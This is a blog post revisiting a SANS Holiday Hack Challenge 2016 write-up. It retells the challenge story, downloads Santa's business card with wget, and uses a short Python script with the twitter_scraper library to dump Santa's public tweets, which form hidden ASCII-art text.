Santa's Business Card: SANS Holiday Hack Challenge 2016
Summary
This challenge is graciously provided by the SANS Counter Hack team with the help of other InfoSec community members. It’s a good way to challenge yourself and have fun while doing it. The contributors to this challenge deserve many thanks.
So, I was going through the sent items in my email and found my writeup from the 2016 Sans Holiday Hack Challenge - Santa’s Business Card. This was posted on the previous site, which I decided to move away from for this, and thought it was lost forever. Which was kind of a bummer, because it was the first CTF/Hacking Challenge I finished in college. Well, seems I’ve found it. I will be going through the writeup, revising it, and posting little chunks of it on this blog as I run through it.
Found myself enjoying this challenge a lot. The great thing about what SANS does with these challenge is everything is still available. Even if you don’t get to do a full challenge one year, you can go back and do it. Which is awesome of them to do!
Below, in the Santa’s Business Card section, is the introduction to the challenge. This challenge is broken up into about seven different parts. Like I said, I will just be posting this as an introduction of sorts. Other posts will contain the separate parts and the proof-of-concept/writeups to justify conclusions.
Feedback and criticism is always welcome. I will be the first to admit that I have a lot to learn. If you would like to compare notes, I would enjoy reading your content.
Note, I haven’t completed this challenge in a while. So, I am going to create a new account and see what I can do while going through the writeup.
Challenge Resources
Unfortunately the challenge itself is no longer available. Looks like SANs has taken down a lot of past challenges. Which is understandable considering the infrastructure that goes into it. It can be rather expensive to maintain.
Story
Part 0 - Santa’s Business Card
‘Twas the night before Christmas, and all through the house, not a creature was stirring, except for…
Josh Dosis.
Although quite snuggled in his bed, the precocious 7-year old couldn’t sleep a wink, what with Christmas Morning just a few hours away. Josh climbed out of his bed and scurried down the hallway to his sister Jessica’s room.
“Wake up, Sis! I can’t sleep!”
With her visions of dancing sugar plums rudely interrupted, Jess slowly stirred, yawned, and rubbed her eyes. “What do you want, Josh?”
“Jess! Christmas is almost here. I can’t wait!” Josh exploded.
Jess lectured her over-eager brother, “I’m excited too, but it’s time to sleep. I’m looking forward to a restful holiday tomorrow, one where no one tries to destroy Christmas.”
Josh recognized his sister’s reference to last year’s trouble with ATNAS Corporation and their quest to foil its criminal plot. “Awww…. That was actually great fun! We always have such wonderful holiday adventures together. I almost wish we had a Twime Machine to relive all those great Christmases of the past,” Josh responded as his loose tooth wriggled in his mouth.
“We have had some wonderful fun, my dear brother, but it’s time to go back to bed,” Jessica responded as she rolled over, hoping her brother would get the message.
And then quite suddenly, the kids were startled by a most unusual sound emanating above their heads: a soft thump followed by a subtle scraping sound, as though something was sliding across their rooftop. “What was that?” Jessica jumped up in surprise.
Immediately afterwards, they heard a muffled jingling of bells.
Josh blurted out, “Oh my gosh, Jess, Santa must have just landed on our house!”
The kids then heard the sound of boots walking across the roof, followed by yet more sliding sounds.
“He must be coming down the chimney. I can’t believe it!” Josh squealed.
The sounds continued without pause as they listened to a master of efficiency get to his work downstairs in their living room. They heard the rumpling of wrapped presents being stacked around the tree, the munching of the cookies they had left for Santa’s refreshment, and even a slight gulping sound as their visitor polished off a glass of eggnog by the cookies. Why they even heard a quiet but deeply jolly, “Ho Ho Ho.”
“Let’s sneak a peak at him!” Josh said.
Jess shook her head and responded, “Oh, we can’t do that… it might interfere with his operation. Plus, it’s highly unorthodox for kids to see Santa himself.”
As the children debated whether to go downstairs to see Santa, their discussion was interrupted as the sounds coming from their living room took a rather startling turn. A loud “Oooomph!” was followed by what sounded like a scuffle of sorts.
“What’s happening, Sis?” Josh asked.
“I don’t know,” came the response from his quite frightened sister.
Just then, they heard crashing sounds and the tearing of paper, as if their presents were being smashed by a wild brawl. It all culminated with a sharp snapping sound, as though their Christmas tree itself had been split in half in the melee.
And then….
…Nothing.
Utter silence came from their living room.
Part 1 - A Most Curious Business Card
Despite their palpable fear, the Dosis children knew that they had to investigate what had happened. They left Jessica’s room and tiptoed down the stairs warily, making sure to remain hidden in the shadows. As they peered around the corner at the bottom of the steps, what they saw astonished them.
Ruined presents. A shattered Christmas tree. Needles strewn all about. Obvious signs of a fight. And there, beside it all, was Santa’s big blue sack. But Santa himself was nowhere to be found.
In shock, Jessica uttered, “Someone has abducted Santa Claus!”
Josh was horrified. “Who would do such a thing? And on Christmas Eve, no less. They’ll destroy Christmas! But why?”
The kids scanned for clues, and there on the floor, they found a most unexpected item: a small, rectangular piece of cardstock. Picking it up, Joshua announced, “Hey! This looks like Santa’s business card. It must have fallen out of his pocket while someone was kidnapping him.”
Jess took the card from Joshua’s hands and read it. “It is his business card. And we’re the only ones who know that Santa has disappeared. We’ve got to do something. If we don’t find and rescue Santa, Christmas will be destroyed! Let’s look closer at this card to see if it can be any help in finding out what happened.”
And that, Dear Reader, is where you get involved. Take a close look at Santa’s Business card. You can also inspect the crime scene by entering the Dosis home here . Based on your analysis, please answer the following questions:
Before answering questions 1 and 2.
After creating an account and avatar, you are dropped into a room with Jessica and Josh Dosis. They provide some clues for this part of the challenge. You are also given some quests.
- Find Santa. - Locate/rescue Santa Claus.
- Find the villain. - Santa’s kidnapper
There is also Santa’s business card. This is vital information for this part of the challange. So I decided I would grab it with wget after inspecting the site’s source and finding a link to the file.
wget https://quest2016.holidayhackchallenge.com/img/business_card.png
--2020-07-09 23:20:19-- https://quest2016.holidayhackchallenge.com/img/business_card.png
Resolving quest2016.holidayhackchallenge.com (quest2016.holidayhackchallenge.com)... 104.198.162.173
Connecting to quest2016.holidayhackchallenge.com (quest2016.holidayhackchallenge.com)|104.198.162.173|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 53965 (53K) [image/png]
Saving to: ‘business_card.png’
business_card.png 100%[=============================================================>] 52.70K 301KB/s in 0.2s
2020-07-09 23:20:19 (301 KB/s) - ‘business_card.png’ saved [53965/53965]
After downloading the file, I realized that it might not be vital data because they provide the text on the card in the comments. But, I decided to download the file regardless. Below is the text on the card.
Santa W. Claus - Mass Toy Production & Worldwide Distribution Logistics North Pole
- Twitter: @santawclaus - Instagram: @santawclaus
This data will be used to solve the first and second question in this part of the challenge.
1. What is the secret message in Santa’s tweets?
So, it sounds like there is a secret message hidden in Santa’s tweets on Twitter. Santa’s Twitter account is @santawclaus based on the data provided in the business card. Sounds simple enough. Just have to scrape Santa’s tweets.
In the writeup, it looks like I used a script published on seankross’s Gist named tweet_dumper.py. This script would download a user’s tweets allowed by
the current version of the twitter API at the time and vomit the data into a CSV file. This script is written in Python 2.7 I believe. Which has been retired
(January 1, 2020) and everyone using Python 3.
Link the Gist provided by seankross named tweet_dumper.py can be found below.
So, I am left with a couple of options, considering the compatability issues faced.
- I can attempt to fight with the script that I have available. Figure out the dependences and edit it so Python 3 can interpret the code.
- I can do something that I’ve never done before and write my own script that will scrape Santa’s tweets using Twitter’s API.
How about I give option two a shot. How hard could it be?
Well, not very hard at all apparently. Almost feel terrible for doing it. But, there is a library out there that will allow you to scrape public twitter accounts
without the use of the API. It’s name is twitter_scraper. Looks like the story behind it is the developer got annoyed with the backend API and decided to
reverse engineer Twitter’s frontend API. Library is a Python 3 library, so there were no compatability issues.
Below is a link to the libraries GitHub.
Below is the code that I wrote. This will pull all Santa’s tweets using Twitter’s frontend API. In this little script I wrote, it will just output the data to the console.
#!/usr/bin/python
"""
file: shhc2016_q1_solution.py
author: Timothy (n3s0)
description: Solution to Question 1 for SANS Holiday Hack Challenge 2016. Will pull all tweets for Santa that are available to the public.
library_dependencies:
- twitter_scraper
shout_out_to:
- https://github.com/bisguzar/twitter-scraper
"""
# import necessary libraries
from twitter_scraper import Profile
from twitter_scraper import get_tweets
profile = Profile('santawclaus')
# pull all tweets from the profile
for tweet in get_tweets(profile.username):
print(tweet['text'])
As you can see, when the script is run and redirected into this writeup. It provides the following output. Note that these are all of Santa’s tweets. When I checked the count for the total tweets for Santa’s account, there are 350 tweets. This is something that we can learn a little bit from. My jaw dropped to the floor when I saw that this actually worked. This data is accessible with no authentication that I know of.
I haven’t tried this on an account with more privacy restrictions. But that might be a good thing to look into in the future. Will this be a big deal to some, probably not. But, it is interesting to see what this library can do. Enough ranting. The data can be found below.
SANTAELFHOHOHOCHRISTMASSANTACHRISTMASPEACEONEARTHCHRISTMASELFSANTAELFHOHOHO
GOODWILLTOWARDSMENSANTAPEACEONEARTHHOHOHOJOYSANTAGOODWILLTOWARDSMENJOYJOYQQ
GOODWILLTOWARDSMENGOODWILLTOWARDSMENJOYHOHOHOJOYELFELFPEACEONEARTHJOYHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASCHRISTMASPEACEONEARTHNORTHPOLEHOHOHOELFELFQ
JOYNORTHPOLECHRISTMASPEACEONEARTHNORTHPOLEJOYGOODWILLTOWARDSMENELFCHRISTMAS
CHRISTMASGOODWILLTOWARDSMENELFHOHOHOCHRISTMASPEACEONEARTHPEACEONEARTHJOYELF
HOHOHOGOODWILLTOWARDSMENNORTHPOLEGOODWILLTOWARDSMENSANTAPEACEONEARTHELFELFQ
GOODWILLTOWARDSMENP???????????????????????????????4CHRISTMASJOYELFELFSANTAQ
NORTHPOLEHOHOHOELFf...............................]PEACEONEARTHHOHOHOSANTAQ
SANTASANTAJOYELFQQf...............................]PEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYf...............................]HOHOHOSANTAHOHOHOELFJOYQ
SANTASANTAJOYJOYQQf...............................]GOODWILLTOWARDSMENHOHOHO
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOSANTAQ
NORTHPOLECHRISTMASf...............................]PEACEONEARTHCHRISTMASJOY
PEACEONEARTHSANTAQf...............................]PEACEONEARTHNORTHPOLEELF
JOYCHRISTMASSANTAQf...............................]CHRISTMASHOHOHOCHRISTMAS
NORTHPOLEHOHOHOJOYf...............................]PEACEONEARTHPEACEONEARTH
SANTAELFELFJOYJOYQf.......aaaaaa/....._aaaaa......]PEACEONEARTHNORTHPOLEELF
GOODWILLTOWARDSMENf.......QQWQWQf.....]ELFWQ......]HOHOHOHOHOHOCHRISTMASJOY
NORTHPOLESANTAJOYQf.......HOHOHOf.....]JOYQQ......]CHRISTMASCHRISTMASHOHOHO
NORTHPOLEELFJOYJOYf.......SANTAQf.....]JOYQQ......]NORTHPOLEPEACEONEARTHELF
SANTAPEACEONEARTHQf.......HOHOHOf.....]SANTA......]PEACEONEARTHCHRISTMASELF
ELFSANTASANTAJOYQQf.......HOHOHOf.....]JOYQW......]CHRISTMASPEACEONEARTHJOY
JOYHOHOHONORTHPOLEf.......SANTAQ[.....)ELFQE......]PEACEONEARTHPEACEONEARTH
HOHOHOCHRISTMASJOYf.......$WJOYQ(......$WQQ(......]GOODWILLTOWARDSMENSANTAQ
JOYPEACEONEARTHELFf.......)JOYQ@........??'.......]SANTAPEACEONEARTHHOHOHOQ
JOYJOYPEACEONEARTHL........?$QV'..................]CHRISTMASJOYNORTHPOLEJOY
SANTAJOYCHRISTMASQk...............................jGOODWILLTOWARDSMENJOYJOY
GOODWILLTOWARDSMENW...............................jJOYNORTHPOLEJOYELFSANTAQ
HOHOHOSANTAJOYELFQQ...............................GOODWILLTOWARDSMENHOHOHOQ
CHRISTMASSANTASANTA;................;............=JOYNORTHPOLEPEACEONEARTHQ
GOODWILLTOWARDSMENQL...............)L............jHOHOHOHOHOHOCHRISTMASELFQ
CHRISTMASHOHOHOELFQQ...............dQ,..........<GOODWILLTOWARDSMENHOHOHOQQ
GOODWILLTOWARDSMENQQL.............<QQm,........_HOHOHOHOHOHOCHRISTMASELFELF
SANTACHRISTMASELFELFQc..........._mJOYQc......aPEACEONEARTHCHRISTMASSANTAQQ
CHRISTMASPEACEONEARTHQw........._mSANTAWmwaawGOODWILLTOWARDSMENSANTAJOYELFQ
PEACEONEARTHELFSANTAELFQw,,..__yHOHOHOELFQWQQWGOODWILLTOWARDSMENHOHOHOSANTA
ELFHOHOHONORTHPOLEELFJOYWGOODWILLTOWARDSMENCHRISTMASSANTACHRISTMASJOYSANTAQ
ELFELFHOHOHOHOHOHOHOHOHONORTHPOLEJOYHOHOHOGOODWILLTOWARDSMENELFELFELFSANTAQ
ELFHOHOHOJOYPEACEONEARTHPEACEONEARTHJOYGOODWILLTOWARDSMENJOYELFPEACEONEARTH
GOODWILLTOWARDSMENJOYGOODWILLTOWARDSMENGOODWILLTOWARDSMENSANTAELFJOYJOYJOYQ
ELFSANTAPEACEONEARTHJOYJOYQQDT????????????????????4NORTHPOLEPEACEONEARTHELF
NORTHPOLENORTHPOLESANTAQWT^.......................]NORTHPOLEELFHOHOHOJOYELF
HOHOHOHOHOHOCHRISTMASQQP`.........................]JOYGOODWILLTOWARDSMENELF
ELFPEACEONEARTHSANTAQQ(...........................]HOHOHOSANTACHRISTMASJOYQ
JOYJOYCHRISTMASELFJOY(............................]GOODWILLTOWARDSMENHOHOHO
CHRISTMASELFELFELFQQf.............................]HOHOHONORTHPOLEJOYELFJOY
SANTACHRISTMASJOYQQD..............................]HOHOHOHOHOHOSANTASANTAQQ
HOHOHOELFSANTAELFQQ(..............................]GOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMENW...............................]NORTHPOLEHOHOHOHOHOHOJOY
CHRISTMASHOHOHOJOYF...............................]GOODWILLTOWARDSMENSANTAQ
CHRISTMASCHRISTMAS[.........._aaaaaaaaaaaaaaaaaaaajPEACEONEARTHELFNORTHPOLE
SANTANORTHPOLEELFQ(........jJOYQWQWWQWWQWWWWWWWWWGOODWILLTOWARDSMENHOHOHOQQ
ELFPEACEONEARTHELF;.......jWWSANTAGOODWILLTOWARDSMENSANTAGOODWILLTOWARDSMEN
ELFJOYNORTHPOLEJOY`.......QWGOODWILLTOWARDSMENGOODWILLTOWARDSMENCHRISTMASQQ
PEACEONEARTHJOYELF.......]WPEACEONEARTHCHRISTMASNORTHPOLEPEACEONEARTHHOHOHO
CHRISTMASJOYHOHOHO.......]HOHOHOELFGOODWILLTOWARDSMENPEACEONEARTHCHRISTMASQ
JOYCHRISTMASJOYELF.......]PEACEONEARTHCHRISTMASGOODWILLTOWARDSMENELFHOHOHOQ
JOYPEACEONEARTHJOY.......)WGOODWILLTOWARDSMENSANTANORTHPOLEJOYPEACEONEARTHQ
CHRISTMASHOHOHOELF........$WPEACEONEARTHNORTHPOLESANTAPEACEONEARTHSANTAJOYQ
JOYHOHOHOELFELFJOY;.......-QWCHRISTMASGOODWILLTOWARDSMENPEACEONEARTHJOYELFQ
HOHOHOCHRISTMASJOY(........-?$QWJOYCHRISTMASSANTACHRISTMASCHRISTMASHOHOHOQQ
ELFJOYELFCHRISTMASf...............................]PEACEONEARTHNORTHPOLEJOY
ELFHOHOHOSANTAELFQh...............................]GOODWILLTOWARDSMENHOHOHO
SANTACHRISTMASELFQQ,..............................]PEACEONEARTHPEACEONEARTH
GOODWILLTOWARDSMENQL..............................]HOHOHOELFCHRISTMASSANTAQ
GOODWILLTOWARDSMENQQ,.............................]PEACEONEARTHELFHOHOHOJOY
NORTHPOLESANTAHOHOHOm.............................]HOHOHOGOODWILLTOWARDSMEN
PEACEONEARTHCHRISTMASg............................]ELFHOHOHOSANTANORTHPOLEQ
NORTHPOLECHRISTMASJOYQm,..........................]NORTHPOLECHRISTMASSANTAQ
SANTASANTACHRISTMASSANTAw,........................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWQga,,....................]PEACEONEARTHPEACEONEARTH
PEACEONEARTHJOYCHRISTMASELFWCHRISTMASGOODWILLTOWARDSMENJOYPEACEONEARTHSANTA
PEACEONEARTHPEACEONEARTHCHRISTMASJOYSANTAPEACEONEARTHCHRISTMASELFHOHOHOELFQ
GOODWILLTOWARDSMENNORTHPOLECHRISTMASPEACEONEARTHHOHOHOELFJOYNORTHPOLEELFELF
JOYGOODWILLTOWARDSMENSANTACHRISTMASJOYPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOQ
HOHOHOCHRISTMASHOHOHOSANTANORTHPOLEPEACEONEARTHJOYPEACEONEARTHJOYJOYHOHOHOQ
JOYELFGOODWILLTOWARDSMENSANTAQBTT???TT$SANTASANTAPEACEONEARTHNORTHPOLEJOYQQ
SANTACHRISTMASCHRISTMASJOYWP"`.........-"9NORTHPOLEPEACEONEARTHCHRISTMASELF
SANTAELFELFELFSANTAJOYQQWP`...............-4JOYSANTANORTHPOLEJOYSANTASANTAQ
ELFELFELFHOHOHOHOHOHOQQ@'..................."$CHRISTMASELFSANTANORTHPOLEELF
ELFCHRISTMASSANTAELFQQP`.....................-$WELFWPEACEONEARTHSANTASANTAQ
SANTANORTHPOLEJOYELFQE........................-$SANTAELFWGOODWILLTOWARDSMEN
NORTHPOLEELFELFELFQQ@`.........................-QWPEACEONEARTHPEACEONEARTHQ
PEACEONEARTHJOYJOYQQ(...........................]CHRISTMASHOHOHOELFSANTAJOY
HOHOHOCHRISTMASELFQP.............................$NORTHPOLEJOYQWJOYWJOYWELF
SANTACHRISTMASJOYQQ(.............................]WSANTAWPEACEONEARTHJOYELF
HOHOHOSANTAJOYELFQW............_aaaas,............QWCHRISTMASQWHOHOHOSANTAQ
SANTAPEACEONEARTHQf........._wELFWWWWQQw,.........3ELFHOHOHOJOYJOYSANTAELFQ
CHRISTMASSANTAELFQ[........<HOHOHOELFELFQc........]CHRISTMASPEACEONEARTHELF
CHRISTMASCHRISTMAS(......._PEACEONEARTHJOY/.......)NORTHPOLESANTAELFQWELFWQ
PEACEONEARTHSANTAQ`.......dNORTHPOLEHOHOHOm.......:NORTHPOLEWCHRISTMASJOYQQ
PEACEONEARTHELFELF........SANTANORTHPOLEJOY;.......SANTASANTAJOYQWSANTAJOYQ
PEACEONEARTHSANTAQ.......]ELFSANTAJOYJOYELF[.......GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMEN.......]ELFNORTHPOLEJOYQQf.......ELFSANTAJOYHOHOHOQQWELFQ
GOODWILLTOWARDSMEN.......]ELF.......]JOYELF[.......PEACEONEARTHPEACEONEARTH
HOHOHOJOYNORTHPOLE.......]JOY.......]SANTAQ'.......SANTASANTAQQWNORTHPOLEQQ
CHRISTMASNORTHPOLE:......)WQQ.......]SANTAD........NORTHPOLESANTAELFWELFJOY
ELFCHRISTMASSANTAQ;......-JOY.......]ELFQW'.......:PEACEONEARTHCHRISTMASJOY
CHRISTMASSANTAELFQ[.......WQQ.......]ELFD'........=HOHOHOGOODWILLTOWARDSMEN
ELFELFSANTAJOYELFQL.......]QQ.......]ELF..........]PEACEONEARTHQWCHRISTMASQ
NORTHPOLESANTAELFQm.......+QQ.......]ELF;.........jWNORTHPOLENORTHPOLEELFWQ
JOYELFHOHOHOSANTAQQ.................]JOY[.........mCHRISTMASCHRISTMASQQWELF
NORTHPOLENORTHPOLEQ[................]JOYL........_PEACEONEARTHSANTASANTAELF
SANTANORTHPOLEJOYQQm................]ELFk........dHOHOHOPEACEONEARTHQQWJOYQ
PEACEONEARTHHOHOHOQQc...............]JOYm.......]PEACEONEARTHHOHOHOWHOHOHOQ
CHRISTMASHOHOHOJOYQQm...............]ELFQ......_GOODWILLTOWARDSMENNORTHPOLE
JOYELFNORTHPOLEJOYELFL..............]JOYQ;....<SANTAHOHOHONORTHPOLEELFSANTA
PEACEONEARTHELFHOHOHOQ,.............]JOYQ[...wPEACEONEARTHELFSANTAWHOHOHOQQ
CHRISTMASELFELFELFJOYQ6.............]ELFQL_wPEACEONEARTHHOHOHOCHRISTMASELFQ
HOHOHOJOYNORTHPOLEQWELFwaaaaaaaaaaaajPEACEONEARTHGOODWILLTOWARDSMENSANTAQWQ
CHRISTMASELFPEACEONEARTHWWWQWWQWWWWELFELFSANTANORTHPOLESANTAELFQQWJOYHOHOHO
CHRISTMASNORTHPOLEHOHOHOHOHOHOCHRISTMASGOODWILLTOWARDSMENNORTHPOLEHOHOHOWQQ
GOODWILLTOWARDSMENNORTHPOLENORTHPOLESANTANORTHPOLEJOYSANTAELFELFWCHRISTMASQ
GOODWILLTOWARDSMENHOHOHOHOHOHONORTHPOLEELFSANTAELFNORTHPOLEPEACEONEARTHELFQ
PEACEONEARTHELFELFQWPEACEONEARTHPEACEONEARTHHOHOHOPEACEONEARTHWNORTHPOLEWQQ
ELFPEACEONEARTHCHRISTMASELFPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENSANTAQ
SANTASANTASANTAJOYELFJOYWGOODWILLTOWARDSMENPEACEONEARTHSANTAWPEACEONEARTHQQ
PEACEONEARTHSANTAJOYGOODWILLTOWARDSMENSANTACHRISTMASELFCHRISTMASELFJOYQWELF
CHRISTMASCHRISTMASELFELFHOHOHOWJOYWNORTHPOLESANTACHRISTMASWSANTAJOYQQWJOYQQ
ELFJOYSANTAJOYJOYQQWJOYWPEACEONEARTHNORTHPOLEHOHOHOHOHOHONORTHPOLEELFJOYELF
ELFNORTHPOLEJOYSANTANORTHPOLECHRISTMASQQWPEACEONEARTHJOYQWHOHOHOJOYWJOYELFQ
NORTHPOLECHRISTMASHOHOHOSANTAWPEACEONEARTHGOODWILLTOWARDSMENCHRISTMASHOHOHO
GOODWILLTOWARDSMENSANTACHRISTMASSANTAQQWELFHOHOHOSANTAQQWJOYSANTAQWSANTAJOY
JOYNORTHPOLEJOYPEACEONEARTHWELFELFQQWNORTHPOLEQWHOHOHONORTHPOLEELFELFHOHOHO
CHRISTMASSANTASANTAWJOYWCHRISTMASHOHOHONORTHPOLEJOYQQWHOHOHOSANTAWNORTHPOLE
PEACEONEARTHSANTASANTAPEACEONEARTHNORTHPOLEJOYJOYJOYELFCHRISTMASHOHOHOSANTA
SANTASANTACHRISTMASJOYJOYJOYELFJOYQWHOHOHOJOYQWPEACEONEARTHELFQQWCHRISTMASQ
GOODWILLTOWARDSMENELFPEACEONEARTHHOHOHOCHRISTMASELFQWHOHOHOWCHRISTMASHOHOHO
CHRISTMASELFELFPEACEONEARTHWELFQQWHOHOHOQQWCHRISTMASELFJOYNORTHPOLEHOHOHOQQ
SANTAPEACEONEARTHQQWJOYWCHRISTMASHOHOHOPEACEONEARTHGOODWILLTOWARDSMENJOYQWQ
JOYJOYHOHOHOELFELFP???????????????????????????????4SANTAQQWPEACEONEARTHELFQ
NORTHPOLENORTHPOLEf...............................]PEACEONEARTHQQWHOHOHOWQQ
CHRISTMASJOYHOHOHOf...............................]ELFGOODWILLTOWARDSMENELF
NORTHPOLEELFELFELFf...............................]PEACEONEARTHHOHOHOQQWELF
NORTHPOLEHOHOHOELFf...............................]CHRISTMASJOYQWSANTASANTA
SANTAJOYNORTHPOLEQf...............................]SANTAHOHOHOWJOYCHRISTMAS
GOODWILLTOWARDSMENf...............................]PEACEONEARTHHOHOHOQWJOYQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENHOHOHO
JOYCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENf...............................]NORTHPOLEPEACEONEARTHJOY
ELFSANTAHOHOHOELFQf.......aaaaaa/....._aaaaa......]GOODWILLTOWARDSMENWELFQQ
NORTHPOLEHOHOHOELFf.......QWWWWQf.....]QQWWQ......]HOHOHOHOHOHOQQWJOYSANTAQ
SANTANORTHPOLEJOYQf.......HOHOHOf.....]JOYQQ......]HOHOHOHOHOHONORTHPOLEELF
NORTHPOLEJOYJOYELFf.......JOYELFf.....]SANTA......]NORTHPOLEHOHOHONORTHPOLE
SANTASANTASANTAELFf.......JOYELFf.....]SANTA......]NORTHPOLENORTHPOLEELFELF
GOODWILLTOWARDSMENf.......JOYJOYf.....]JOYQW......]PEACEONEARTHHOHOHOQWELFQ
GOODWILLTOWARDSMENf.......HOHOHO[.....)JOYQE......]HOHOHOELFHOHOHOQQWJOYJOY
JOYNORTHPOLEELFELFf.......$WELFQ(......$WQQ(......]PEACEONEARTHNORTHPOLEELF
NORTHPOLEJOYELFJOYf.......)ELFQ@........??'.......]CHRISTMASPEACEONEARTHJOY
SANTAPEACEONEARTHQL........?$QV'..................]HOHOHOGOODWILLTOWARDSMEN
JOYELFPEACEONEARTHk...............................jJOYSANTACHRISTMASWJOYJOY
SANTAPEACEONEARTHQW...............................jSANTAGOODWILLTOWARDSMENQ
CHRISTMASSANTAELFQQ...............................HOHOHOPEACEONEARTHSANTAQQ
ELFCHRISTMASELFELFQ;................;............=NORTHPOLENORTHPOLEJOYELFQ
NORTHPOLEJOYSANTAQQ[...............)L............jPEACEONEARTHJOYHOHOHOQQWQ
CHRISTMASHOHOHOJOYQm...............dQ,..........<GOODWILLTOWARDSMENQWSANTAQ
SANTACHRISTMASSANTAQL.............<QQm,........_JOYELFGOODWILLTOWARDSMENELF
HOHOHOSANTASANTAJOYQQc..........._mELFQc......aGOODWILLTOWARDSMENSANTAJOYWQ
CHRISTMASHOHOHOJOYJOYQw........._mELFQQWmwaawGOODWILLTOWARDSMENNORTHPOLEELF
NORTHPOLEELFPEACEONEARTHw,,..__yELFJOYJOYQWQWQWGOODWILLTOWARDSMENCHRISTMASQ
JOYNORTHPOLEELFNORTHPOLEWGOODWILLTOWARDSMENNORTHPOLEJOYJOYJOYSANTAQQWELFWQQ
JOYSANTAELFHOHOHOQQWNORTHPOLENORTHPOLEGOODWILLTOWARDSMENSANTASANTAHOHOHOJOY
ELFHOHOHOCHRISTMASCHRISTMASELFPEACEONEARTHHOHOHOELFCHRISTMASHOHOHOELFJOYELF
JOYPEACEONEARTHJOYNORTHPOLEGOODWILLTOWARDSMENHOHOHONORTHPOLEHOHOHOELFELFJOY
HOHOHOPEACEONEARTHELFJOYJOYQV?"~....--"?$CHRISTMASELFWPEACEONEARTHQWHOHOHOQ
CHRISTMASCHRISTMASJOYELFWW?`.............-?CHRISTMASHOHOHOQWELFWSANTAJOYWQQ
SANTAPEACEONEARTHQQWELFQP`.................-4HOHOHOWCHRISTMASNORTHPOLESANTA
CHRISTMASNORTHPOLEJOYQW(.....................)WGOODWILLTOWARDSMENNORTHPOLEQ
GOODWILLTOWARDSMENJOYW'.......................)WSANTAJOYQQWNORTHPOLEHOHOHOQ
JOYNORTHPOLEHOHOHOJOY(.........................)PEACEONEARTHSANTAELFWJOYWQQ
GOODWILLTOWARDSMENQQf...........................4PEACEONEARTHELFQWCHRISTMAS
NORTHPOLEHOHOHOELFQW`...........................-HOHOHOWCHRISTMASCHRISTMASQ
GOODWILLTOWARDSMENQf.............................]JOYJOYSANTAELFWCHRISTMASQ
HOHOHONORTHPOLEJOYQ`.............................-HOHOHOELFQWCHRISTMASSANTA
ELFELFELFJOYHOHOHOE.........._wwQWQQmga,..........$GOODWILLTOWARDSMENJOYWQQ
NORTHPOLECHRISTMASf........_yJOYWSANTAQQg,........]PEACEONEARTHPEACEONEARTH
SANTANORTHPOLEJOYQ[......._ELFELFSANTAELFQ,.......]CHRISTMASSANTASANTAWJOYQ
CHRISTMASCHRISTMAS;.......dPEACEONEARTHJOYk.......=JOYJOYHOHOHOQWJOYWHOHOHO
ELFNORTHPOLEELFELF......._HOHOHOCHRISTMASQQ,.......NORTHPOLEQWSANTASANTAELF
PEACEONEARTHJOYJOY.......]PEACEONEARTHJOYQQ[.......GOODWILLTOWARDSMENELFJOY
HOHOHOELFNORTHPOLE.......]PEACEONEARTHSANTAf.......NORTHPOLEHOHOHOHOHOHOELF
ELFSANTAELFHOHOHOQ.......]NORTHPOLEHOHOHOQQ[.......GOODWILLTOWARDSMENHOHOHO
CHRISTMASCHRISTMAS.......)PEACEONEARTHJOYQQ(.......HOHOHOHOHOHOSANTAWHOHOHO
SANTASANTAELFJOYQQ........HOHOHOCHRISTMASQ@.......:NORTHPOLEELFQWSANTASANTA
CHRISTMASCHRISTMAS;.......]PEACEONEARTHELF[.......<HOHOHOSANTANORTHPOLEQQWQ
HOHOHOPEACEONEARTH[........4HOHOHOJOYELFQf........]PEACEONEARTHHOHOHOHOHOHO
CHRISTMASCHRISTMASL........."HWJOYSANTAD^.........jNORTHPOLENORTHPOLEHOHOHO
GOODWILLTOWARDSMENm............"!???!"`...........NORTHPOLEHOHOHOWJOYQWELFQ
CHRISTMASJOYELFELFQ/.............................]WNORTHPOLECHRISTMASHOHOHO
SANTAJOYCHRISTMASQQk.............................dPEACEONEARTHELFELFHOHOHOQ
SANTAPEACEONEARTHJOY/...........................<NORTHPOLECHRISTMASHOHOHOQQ
ELFSANTASANTASANTAQQm...........................mJOYELFSANTAPEACEONEARTHELF
CHRISTMASCHRISTMASELFk.........................jGOODWILLTOWARDSMENQWJOYWELF
ELFJOYCHRISTMASJOYJOYQL.......................jNORTHPOLENORTHPOLEJOYJOYJOYQ
ELFELFJOYSANTAJOYELFELFg,..................._yGOODWILLTOWARDSMENQQWSANTAELF
PEACEONEARTHJOYELFQWSANTAc.................aQWCHRISTMASHOHOHOSANTAJOYHOHOHO
SANTAJOYJOYPEACEONEARTHELFQa,..........._wQWWHOHOHOSANTAJOYELFQQWJOYSANTAQQ
HOHOHOELFJOYPEACEONEARTHQQWJOYmwwaaaawyJOYWCHRISTMASHOHOHOPEACEONEARTHJOYWQ
ELFCHRISTMASSANTASANTASANTAJOYQQWWWWQWGOODWILLTOWARDSMENJOYELFQWCHRISTMASQQ
SANTAHOHOHOELFPEACEONEARTHGOODWILLTOWARDSMENJOYPEACEONEARTHSANTASANTAJOYWQQ
HOHOHOJOYELFJOYELFQWGOODWILLTOWARDSMENPEACEONEARTHGOODWILLTOWARDSMENELFELFQ
NORTHPOLEJOYJOYELFHOHOHOWPEACEONEARTHNORTHPOLECHRISTMASHOHOHOQWELFJOYQQWJOY
GOODWILLTOWARDSMENSANTAJOYNORTHPOLENORTHPOLEHOHOHOHOHOHOGOODWILLTOWARDSMENQ
CHRISTMASJOYSANTANORTHPOLEV?"-....................]GOODWILLTOWARDSMENQWJOYQ
GOODWILLTOWARDSMENSANTAW?`........................]GOODWILLTOWARDSMENSANTAQ
HOHOHOELFJOYJOYELFQWQQD'..........................]HOHOHONORTHPOLEQWHOHOHOQ
PEACEONEARTHHOHOHOJOYP`...........................]SANTAJOYELFWHOHOHOHOHOHO
